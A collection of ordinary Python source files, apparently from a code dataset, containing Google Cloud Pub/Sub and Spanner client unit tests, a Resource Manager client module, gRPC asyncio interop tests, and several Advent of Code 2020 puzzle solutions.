client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
with pytest.raises(CustomException):
client.delete_topic(topic)
def test_set_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b'21'
expected_response = {'version': version, 'etag': etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
policy = {}
response = client.set_iam_policy(resource, policy)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.SetIamPolicyRequest(
resource=resource, policy=policy)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_set_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
policy = {}
with pytest.raises(CustomException):
client.set_iam_policy(resource, policy)
def test_get_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b'21'
expected_response = {'version': version, 'etag': etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
response = client.get_iam_policy(resource)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.GetIamPolicyRequest(
resource=resource)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
with pytest.raises(CustomException):
client.get_iam_policy(resource)
def test_test_iam_permissions(self):
# Setup Expected Response
expected_response = {}
expected_response = iam_policy_pb2.TestIamPermissionsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
permissions = []
response = client.test_iam_permissions(resource, permissions)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.TestIamPermissionsRequest(
resource=resource, permissions=permissions)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_test_iam_permissions_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
permissions = []
with pytest.raises(CustomException):
client.test_iam_permissions(resource, permissions)
```
#### File: cloud/resource_manager/client.py
```python
from google.api_core import page_iterator
from google.cloud.client import Client as BaseClient
from google.cloud.resource_manager._http import Connection
from google.cloud.resource_manager.project import Project
class Client(BaseClient):
"""Client to bundle configuration needed for API requests.
See
https://cloud.google.com/resource-manager/reference/rest/
for more information on this API.
Automatically get credentials::
>>> from google.cloud import resource_manager
>>> client = resource_manager.Client()
:type credentials: :class:`~google.auth.credentials.Credentials`
:param credentials: (Optional) The OAuth2 Credentials to use for this
client. If not passed (and if no ``_http`` object is
passed), falls back to the default inferred from the
environment.
:type _http: :class:`~requests.Session`
:param _http: (Optional) HTTP object to make requests. Can be any object
that defines ``request()`` with the same interface as
:meth:`requests.Session.request`. If not passed, an
``_http`` object is created that is bound to the
``credentials`` for the current object.
This parameter should be considered private, and could
change in the future.
"""
SCOPE = ('https://www.googleapis.com/auth/cloud-platform',)
"""The scopes required for authenticating as a Resouce Manager consumer."""
def __init__(self, credentials=None, _http=None):
super(Client, self).__init__(
credentials=credentials, _http=_http)
self._connection = Connection(self)
def new_project(self, project_id, name=None, labels=None):
"""Create a project bound to the current client.
Use :meth:`Project.reload() \
<google.cloud.resource_manager.project.Project.reload>` to retrieve
project metadata after creating a
:class:`~google.cloud.resource_manager.project.Project` instance.
        .. note::
This does not make an API call.
:type project_id: str
:param project_id: The ID for this project.
:type name: str
:param name: The display name of the project.
:type labels: dict
        :param labels: A dictionary of labels associated with the project.
:rtype: :class:`~google.cloud.resource_manager.project.Project`
:returns: A new instance of a
:class:`~google.cloud.resource_manager.project.Project`
**without** any metadata loaded.
"""
return Project(project_id=project_id,
client=self, name=name, labels=labels)
def fetch_project(self, project_id):
"""Fetch an existing project and it's relevant metadata by ID.
.. note::
If the project does not exist, this will raise a
:class:`NotFound <google.cloud.exceptions.NotFound>` error.
:type project_id: str
:param project_id: The ID for this project.
:rtype: :class:`~google.cloud.resource_manager.project.Project`
:returns: A :class:`~google.cloud.resource_manager.project.Project`
with metadata fetched from the API.
"""
project = self.new_project(project_id)
project.reload()
return project
def list_projects(self, filter_params=None, page_size=None):
"""List the projects visible to this client.
Example::
>>> from google.cloud import resource_manager
>>> client = resource_manager.Client()
>>> for project in client.list_projects():
... print(project.project_id)
List all projects with label ``'environment'`` set to ``'prod'``
(filtering by labels)::
>>> from google.cloud import resource_manager
>>> client = resource_manager.Client()
>>> env_filter = {'labels.environment': 'prod'}
>>> for project in client.list_projects(env_filter):
... print(project.project_id)
See
https://cloud.google.com/resource-manager/reference/rest/v1beta1/projects/list
Complete filtering example::
>>> project_filter = { # Return projects with...
... 'name': 'My Project', # name set to 'My Project'.
... 'id': 'my-project-id', # id set to 'my-project-id'.
... 'labels.stage': 'prod', # the label 'stage' set to 'prod'
... 'labels.color': '*' # a label 'color' set to anything.
... }
>>> client.list_projects(project_filter)
:type filter_params: dict
:param filter_params: (Optional) A dictionary of filter options where
each key is a property to filter on, and each
value is the (case-insensitive) value to check
(or the glob ``*`` to check for existence of the
property). See the example above for more
details.
:type page_size: int
:param page_size: (Optional) Maximum number of projects to return in a
single page. If not passed, defaults to a value set
by the API.
:rtype: :class:`~google.api_core.page_iterator.Iterator`
:returns: Iterator of all
                  :class:`~google.cloud.resource_manager.project.Project`
                  that the current user has access to.
"""
extra_params = {}
if page_size is not None:
extra_params['pageSize'] = page_size
if filter_params is not None:
extra_params['filter'] = filter_params
return page_iterator.HTTPIterator(
client=self,
api_request=self._connection.api_request,
path='/projects',
item_to_value=_item_to_project,
items_key='projects',
extra_params=extra_params)
def _item_to_project(iterator, resource):
"""Convert a JSON project to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that has retrieved the item.
:type resource: dict
:param resource: A resource to be converted to a project.
:rtype: :class:`.Project`
:returns: The next project in the page.
"""
return Project.from_api_repr(resource, client=iterator.client)
```
#### File: tests/unit/test_pool.py
```python
from functools import total_ordering
import unittest
class TestAbstractSessionPool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import AbstractSessionPool
return AbstractSessionPool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
def test_bind_abstract(self):
pool = self._make_one()
database = _Database('name')
with self.assertRaises(NotImplementedError):
pool.bind(database)
def test_get_abstract(self):
pool = self._make_one()
with self.assertRaises(NotImplementedError):
pool.get()
def test_put_abstract(self):
pool = self._make_one()
session = object()
with self.assertRaises(NotImplementedError):
pool.put(session)
def test_clear_abstract(self):
pool = self._make_one()
with self.assertRaises(NotImplementedError):
pool.clear()
def test_session_wo_kwargs(self):
from google.cloud.spanner_v1.pool import SessionCheckout
pool = self._make_one()
checkout = pool.session()
self.assertIsInstance(checkout, SessionCheckout)
self.assertIs(checkout._pool, pool)
self.assertIsNone(checkout._session)
self.assertEqual(checkout._kwargs, {})
def test_session_w_kwargs(self):
from google.cloud.spanner_v1.pool import SessionCheckout
pool = self._make_one()
checkout = pool.session(foo='bar')
self.assertIsInstance(checkout, SessionCheckout)
self.assertIs(checkout._pool, pool)
self.assertIsNone(checkout._session)
self.assertEqual(checkout._kwargs, {'foo': 'bar'})
class TestFixedSizePool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import FixedSizePool
return FixedSizePool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertTrue(pool._sessions.empty())
def test_ctor_explicit(self):
pool = self._make_one(size=4, default_timeout=30)
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 4)
self.assertEqual(pool.default_timeout, 30)
self.assertTrue(pool._sessions.empty())
def test_bind(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database)] * 10
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertIs(pool._database, database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
def test_get_non_expired(self):
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[0])
self.assertTrue(session._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_expired(self):
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 5
SESSIONS[0]._exists = False
database._sessions.extend(SESSIONS)
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[4])
self.assertTrue(session._created)
self.assertTrue(SESSIONS[0]._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_empty_default_timeout(self):
from six.moves.queue import Empty
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
with self.assertRaises(Empty):
pool.get()
self.assertEqual(queue._got, {'block': True, 'timeout': 10})
def test_get_empty_explicit_timeout(self):
from six.moves.queue import Empty
pool = self._make_one(size=1, default_timeout=0.1)
queue = pool._sessions = _Queue()
with self.assertRaises(Empty):
pool.get(timeout=1)
self.assertEqual(queue._got, {'block': True, 'timeout': 1})
def test_put_full(self):
from six.moves.queue import Full
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
with self.assertRaises(Full):
pool.put(_Session(database))
self.assertTrue(pool._sessions.full())
def test_put_non_full(self):
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
pool._sessions.get()
pool.put(_Session(database))
self.assertTrue(pool._sessions.full())
def test_clear(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database)] * 10
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
pool.clear()
for session in SESSIONS:
self.assertTrue(session._deleted)
class TestBurstyPool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import BurstyPool
return BurstyPool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
self.assertEqual(pool.target_size, 10)
self.assertTrue(pool._sessions.empty())
def test_ctor_explicit(self):
pool = self._make_one(target_size=4)
self.assertIsNone(pool._database)
self.assertEqual(pool.target_size, 4)
self.assertTrue(pool._sessions.empty())
def test_get_empty(self):
pool = self._make_one()
database = _Database('name')
database._sessions.append(_Session(database))
pool.bind(database)
session = pool.get()
self.assertIsInstance(session, _Session)
self.assertIs(session._database, database)
self.assertTrue(session._created)
self.assertTrue(pool._sessions.empty())
def test_get_non_empty_session_exists(self):
pool = self._make_one()
database = _Database('name')
previous = _Session(database)
pool.bind(database)
pool.put(previous)
session = pool.get()
self.assertIs(session, previous)
self.assertFalse(session._created)
self.assertTrue(session._exists_checked)
self.assertTrue(pool._sessions.empty())
def test_get_non_empty_session_expired(self):
pool = self._make_one()
database = _Database('name')
previous = _Session(database, exists=False)
newborn = _Session(database)
database._sessions.append(newborn)
pool.bind(database)
pool.put(previous)
session = pool.get()
self.assertTrue(previous._exists_checked)
self.assertIs(session, newborn)
self.assertTrue(session._created)
self.assertFalse(session._exists_checked)
self.assertTrue(pool._sessions.empty())
def test_put_empty(self):
pool = self._make_one()
database = _Database('name')
pool.bind(database)
session = _Session(database)
pool.put(session)
self.assertFalse(pool._sessions.empty())
def test_put_full(self):
pool = self._make_one(target_size=1)
database = _Database('name')
pool.bind(database)
older = _Session(database)
pool.put(older)
self.assertFalse(pool._sessions.empty())
younger = _Session(database)
pool.put(younger) # discarded silently
self.assertTrue(younger._deleted)
self.assertIs(pool.get(), older)
def test_put_full_expired(self):
pool = self._make_one(target_size=1)
database = _Database('name')
pool.bind(database)
older = _Session(database)
pool.put(older)
self.assertFalse(pool._sessions.empty())
younger = _Session(database, exists=False)
pool.put(younger) # discarded silently
self.assertTrue(younger._deleted)
self.assertIs(pool.get(), older)
def test_clear(self):
pool = self._make_one()
database = _Database('name')
pool.bind(database)
previous = _Session(database)
pool.put(previous)
pool.clear()
self.assertTrue(previous._deleted)
class TestPingingPool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import PingingPool
return PingingPool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.empty())
def test_ctor_explicit(self):
pool = self._make_one(size=4, default_timeout=30, ping_interval=1800)
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 4)
self.assertEqual(pool.default_timeout, 30)
self.assertEqual(pool._delta.seconds, 1800)
self.assertTrue(pool._sessions.empty())
def test_bind(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database)] * 10
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertIs(pool._database, database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
def test_get_hit_no_ping(self):
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[0])
self.assertFalse(session._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_hit_w_ping(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
sessions_created = (
datetime.datetime.utcnow() - datetime.timedelta(seconds=4000))
with _Monkey(MUT, _NOW=lambda: sessions_created):
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[0])
self.assertTrue(session._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_hit_w_ping_expired(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 5
SESSIONS[0]._exists = False
database._sessions.extend(SESSIONS)
sessions_created = (
datetime.datetime.utcnow() - datetime.timedelta(seconds=4000))
with _Monkey(MUT, _NOW=lambda: sessions_created):
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[4])
self.assertTrue(session._created)
self.assertTrue(SESSIONS[0]._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_empty_default_timeout(self):
from six.moves.queue import Empty
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
with self.assertRaises(Empty):
pool.get()
self.assertEqual(queue._got, {'block': True, 'timeout': 10})
def test_get_empty_explicit_timeout(self):
from six.moves.queue import Empty
pool = self._make_one(size=1, default_timeout=0.1)
queue = pool._sessions = _Queue()
with self.assertRaises(Empty):
pool.get(timeout=1)
self.assertEqual(queue._got, {'block': True, 'timeout': 1})
def test_put_full(self):
from six.moves.queue import Full
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
with self.assertRaises(Full):
pool.put(_Session(database))
self.assertTrue(pool._sessions.full())
def test_put_non_full(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
now = datetime.datetime.utcnow()
database = _Database('name')
session = _Session(database)
with _Monkey(MUT, _NOW=lambda: now):
pool.put(session)
self.assertEqual(len(queue._items), 1)
ping_after, queued = queue._items[0]
self.assertEqual(ping_after, now + datetime.timedelta(seconds=3000))
self.assertIs(queued, session)
def test_clear(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database)] * 10
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
pool.clear()
for session in SESSIONS:
self.assertTrue(session._deleted)
def test_ping_empty(self):
pool = self._make_one(size=1)
pool.ping() # Does not raise 'Empty'
def test_ping_oldest_fresh(self):
pool = self._make_one(size=1)
database = _Database('name')
SESSIONS = [_Session(database)] * 1
database._sessions.extend(SESSIONS)
pool.bind(database)
pool.ping()
self.assertFalse(SESSIONS[0]._exists_checked)
def test_ping_oldest_stale_but_exists(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=1)
database = _Database('name')
SESSIONS = [_Session(database)] * 1
database._sessions.extend(SESSIONS)
pool.bind(database)
later = datetime.datetime.utcnow() + datetime.timedelta(seconds=4000)
with _Monkey(MUT, _NOW=lambda: later):
pool.ping()
self.assertTrue(SESSIONS[0]._exists_checked)
def test_ping_oldest_stale_and_not_exists(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=1)
database = _Database('name')
SESSIONS = [_Session(database)] * 2
SESSIONS[0]._exists = False
database._sessions.extend(SESSIONS)
pool.bind(database)
later = datetime.datetime.utcnow() + datetime.timedelta(seconds=4000)
with _Monkey(MUT, _NOW=lambda: later):
pool.ping()
self.assertTrue(SESSIONS[0]._exists_checked)
self.assertTrue(SESSIONS[1]._created)
class TestTransactionPingingPool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import TransactionPingingPool
return TransactionPingingPool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.empty())
self.assertTrue(pool._pending_sessions.empty())
def test_ctor_explicit(self):
pool = self._make_one(size=4, default_timeout=30, ping_interval=1800)
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 4)
self.assertEqual(pool.default_timeout, 30)
self.assertEqual(pool._delta.seconds, 1800)
self.assertTrue(pool._sessions.empty())
self.assertTrue(pool._pending_sessions.empty())
def test_bind(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database) for _ in range(10)]
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertIs(pool._database, database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
txn = session._transaction
self.assertTrue(txn._begun)
self.assertTrue(pool._pending_sessions.empty())
def test_bind_w_timestamp_race(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
NOW = datetime.datetime.utcnow()
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database) for _ in range(10)]
database._sessions.extend(SESSIONS)
with _Monkey(MUT, _NOW=lambda: NOW):
pool.bind(database)
self.assertIs(pool._database, database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
txn = session._transaction
self.assertTrue(txn._begun)
self.assertTrue(pool._pending_sessions.empty())
def test_put_full(self):
from six.moves.queue import Full
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database) for _ in range(4)]
database._sessions.extend(SESSIONS)
pool.bind(database)
with self.assertRaises(Full):
pool.put(_Session(database))
self.assertTrue(pool._sessions.full())
def test_put_non_full_w_active_txn(self):
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
pending = pool._pending_sessions = _Queue()
database = _Database('name')
session = _Session(database)
txn = session.transaction()
pool.put(session)
self.assertEqual(len(queue._items), 1)
_, queued = queue._items[0]
self.assertIs(queued, session)
self.assertEqual(len(pending._items), 0)
self.assertFalse(txn._begun)
def test_put_non_full_w_committed_txn(self):
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
pending = pool._pending_sessions = _Queue()
database = _Database('name')
session = _Session(database)
committed = session.transaction()
committed._committed = True
pool.put(session)
self.assertEqual(len(queue._items), 0)
self.assertEqual(len(pending._items), 1)
self.assertIs(pending._items[0], session)
self.assertIsNot(session._transaction, committed)
self.assertFalse(session._transaction._begun)
def test_put_non_full(self):
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
pending = pool._pending_sessions = _Queue()
database = _Database('name')
session = _Session(database)
pool.put(session)
self.assertEqual(len(queue._items), 0)
self.assertEqual(len(pending._items), 1)
self.assertIs(pending._items[0], session)
self.assertFalse(pending.empty())
def test_begin_pending_transactions_empty(self):
pool = self._make_one(size=1)
pool.begin_pending_transactions() # no raise
def test_begin_pending_transactions_non_empty(self):
pool = self._make_one(size=1)
pool._sessions = _Queue()
database = _Database('name')
TRANSACTIONS = [_Transaction()]
PENDING_SESSIONS = [
_Session(database, transaction=txn) for txn in TRANSACTIONS]
pending = pool._pending_sessions = _Queue(*PENDING_SESSIONS)
self.assertFalse(pending.empty())
pool.begin_pending_transactions() # no raise
for txn in TRANSACTIONS:
self.assertTrue(txn._begun)
self.assertTrue(pending.empty())
class TestSessionCheckout(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import SessionCheckout
return SessionCheckout
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_wo_kwargs(self):
pool = _Pool()
checkout = self._make_one(pool)
self.assertIs(checkout._pool, pool)
self.assertIsNone(checkout._session)
self.assertEqual(checkout._kwargs, {})
def test_ctor_w_kwargs(self):
pool = _Pool()
checkout = self._make_one(pool, foo='bar')
self.assertIs(checkout._pool, pool)
self.assertIsNone(checkout._session)
self.assertEqual(checkout._kwargs, {'foo': 'bar'})
def test_context_manager_wo_kwargs(self):
session = object()
pool = _Pool(session)
checkout = self._make_one(pool)
self.assertEqual(len(pool._items), 1)
self.assertIs(pool._items[0], session)
with checkout as borrowed:
self.assertIs(borrowed, session)
self.assertEqual(len(pool._items), 0)
self.assertEqual(len(pool._items), 1)
self.assertIs(pool._items[0], session)
self.assertEqual(pool._got, {})
def test_context_manager_w_kwargs(self):
session = object()
pool = _Pool(session)
checkout = self._make_one(pool, foo='bar')
self.assertEqual(len(pool._items), 1)
self.assertIs(pool._items[0], session)
with checkout as borrowed:
self.assertIs(borrowed, session)
self.assertEqual(len(pool._items), 0)
self.assertEqual(len(pool._items), 1)
self.assertIs(pool._items[0], session)
self.assertEqual(pool._got, {'foo': 'bar'})
class _Transaction(object):
_begun = False
_committed = False
_rolled_back = False
def begin(self):
self._begun = True
def committed(self):
return self._committed
@total_ordering
class _Session(object):
_transaction = None
def __init__(self, database, exists=True, transaction=None):
self._database = database
self._exists = exists
self._exists_checked = False
self._created = False
self._deleted = False
self._transaction = transaction
def __lt__(self, other):
return id(self) < id(other)
def create(self):
self._created = True
def exists(self):
self._exists_checked = True
return self._exists
def delete(self):
from google.cloud.exceptions import NotFound
self._deleted = True
if not self._exists:
raise NotFound("unknown session")
def transaction(self):
txn = self._transaction = _Transaction()
return txn
class _Database(object):
def __init__(self, name):
self.name = name
self._sessions = []
def session(self):
return self._sessions.pop()
class _Queue(object):
_size = 1
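    # Minimal stand-in for the session queue: records the keyword arguments
    # passed to get()/put() so tests can assert on blocking behaviour and timeouts.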
def __init__(self, *items):
self._items = list(items)
def empty(self):
return len(self._items) == 0
def full(self):
return len(self._items) >= self._size
def get(self, **kwargs):
from six.moves.queue import Empty
self._got = kwargs
try:
return self._items.pop()
except IndexError:
raise Empty()
def put(self, item, **kwargs):
self._put = kwargs
self._items.append(item)
def put_nowait(self, item, **kwargs):
self._put_nowait = kwargs
self._items.append(item)
class _Pool(_Queue):
_database = None
``` |
{
"source": "jo2y/grpc",
"score": 2
} |
#### File: tests_aio/interop/local_interop_test.py
```python
import logging
import unittest
import grpc
from grpc.experimental import aio
from src.proto.grpc.testing import test_pb2_grpc
from tests.interop import resources
from tests_aio.interop import methods
from tests_aio.unit._test_base import AioTestBase
from tests_aio.unit._test_server import start_test_server
class InteropTestCaseMixin:
"""Unit test methods.
This class must be mixed in with unittest.TestCase and a class that defines
setUp and tearDown methods that manage a stub attribute.
"""
_stub: test_pb2_grpc.TestServiceStub
async def test_empty_unary(self):
await methods.test_interoperability(methods.TestCase.EMPTY_UNARY,
self._stub, None)
async def test_large_unary(self):
await methods.test_interoperability(methods.TestCase.LARGE_UNARY,
self._stub, None)
async def test_server_streaming(self):
await methods.test_interoperability(methods.TestCase.SERVER_STREAMING,
self._stub, None)
async def test_client_streaming(self):
await methods.test_interoperability(methods.TestCase.CLIENT_STREAMING,
self._stub, None)
async def test_ping_pong(self):
await methods.test_interoperability(methods.TestCase.PING_PONG,
self._stub, None)
async def test_cancel_after_begin(self):
await methods.test_interoperability(methods.TestCase.CANCEL_AFTER_BEGIN,
self._stub, None)
async def test_cancel_after_first_response(self):
await methods.test_interoperability(
methods.TestCase.CANCEL_AFTER_FIRST_RESPONSE, self._stub, None)
@unittest.skip('TODO(https://github.com/grpc/grpc/issues/21707)')
async def test_timeout_on_sleeping_server(self):
await methods.test_interoperability(
methods.TestCase.TIMEOUT_ON_SLEEPING_SERVER, self._stub, None)
async def test_empty_stream(self):
await methods.test_interoperability(methods.TestCase.EMPTY_STREAM,
self._stub, None)
async def test_status_code_and_message(self):
await methods.test_interoperability(
methods.TestCase.STATUS_CODE_AND_MESSAGE, self._stub, None)
async def test_unimplemented_method(self):
await methods.test_interoperability(
methods.TestCase.UNIMPLEMENTED_METHOD, self._stub, None)
async def test_unimplemented_service(self):
await methods.test_interoperability(
methods.TestCase.UNIMPLEMENTED_SERVICE, self._stub, None)
async def test_custom_metadata(self):
await methods.test_interoperability(methods.TestCase.CUSTOM_METADATA,
self._stub, None)
async def test_special_status_message(self):
await methods.test_interoperability(
methods.TestCase.SPECIAL_STATUS_MESSAGE, self._stub, None)
class InsecureLocalInteropTest(InteropTestCaseMixin, AioTestBase):
async def setUp(self):
address, self._server = await start_test_server()
self._channel = aio.insecure_channel(address)
self._stub = test_pb2_grpc.TestServiceStub(self._channel)
async def tearDown(self):
await self._channel.close()
await self._server.stop(None)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
unittest.main(verbosity=2)
``` |
{
"source": "jo3-l/advent",
"score": 3
} |
#### File: 2020/01/p2.py
```python
def solve(input):
xs = list(map(int, input.split()))
xs.sort()
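    # Fix each element as the middle of the triple (by sorted position) and
    # sweep two pointers in from both ends looking for a sum of exactly 2020.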
for i, x in enumerate(xs):
if i == 0 or i == len(xs) - 1:
continue
lo, hi = 0, len(xs) - 1
while lo < i and i < hi:
s = xs[lo] + xs[hi] + x
if s > 2020:
hi -= 1
elif s == 2020:
return xs[lo] * xs[hi] * x
else:
lo += 1
```
#### File: 2020/04/p1.py
```python
def solve(input):
cnt = 0
for p in input.split("\n\n"):
seen = set()
for l in p.split("\n"):
for f in ("byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"):
if l.count(f) > 0:
seen.add(f)
if len(seen) == 7:
cnt += 1
return cnt
```
#### File: 2020/07/p1.py
```python
from collections import defaultdict
def solve(input):
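    # Build a reverse containment map (bag colour -> colours that can directly
    # hold it), then DFS from "shiny gold" to count every possible outer bag.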
par = defaultdict(list)
for l in input.split("\n"):
n, _, c = l.partition(" contain ")
parent = n.removesuffix(" bags")
for child in c.split(", "):
par[" ".join(child.split()[1:-1])].append(parent)
seen = set()
def go(x):
for p in par[x]:
if p not in seen:
seen.add(p)
go(p)
go("shiny gold")
return len(seen)
```
#### File: 2020/08/p2.py
```python
def run(insts):
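    # Run the program until an instruction repeats (infinite loop) or the pointer
    # runs off the end; report the accumulator and whether execution terminated.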
seen = set()
inst = 0
acc = 0
while inst not in seen and 0 <= inst < len(insts):
seen.add(inst)
op, by = insts[inst]
if op == "nop":
inst += 1
elif op == "acc":
acc += by
inst += 1
else:
inst += by
return acc, inst >= len(insts)
def solve(input):
insts = [
[op, int(by)]
for op, _, by in map(lambda l: l.partition(" "), input.split("\n"))
]
for inst in insts:
op = inst[0]
if op not in ("nop", "jmp"):
continue
inst[0] = "jmp" if op == "nop" else "nop"
acc, ok = run(insts)
if ok:
return acc
inst[0] = op
```
#### File: 2020/09/p2.py
```python
import itertools
K = 25
def solve(input):
xs = list(map(int, input.split()))
bad_idx = next(
i + K
for i, x in enumerate(xs[K:])
if not any(
xs[j] + xs[k] == x for j, k in itertools.product(range(i, i + K), repeat=2)
)
)
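    # A contiguous run summing to the invalid number exists exactly when an
    # earlier prefix sum equals the current prefix sum minus that number.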
lo_idx = {}
acc = list(itertools.accumulate(xs[:bad_idx]))
for i, x in enumerate(acc):
c = x - xs[bad_idx]
if c in lo_idx:
window = xs[lo_idx[c] + 1 : i + 1]
return min(window) + max(window)
lo_idx[acc[i - 1] if i > 0 else 0] = i - 1
```
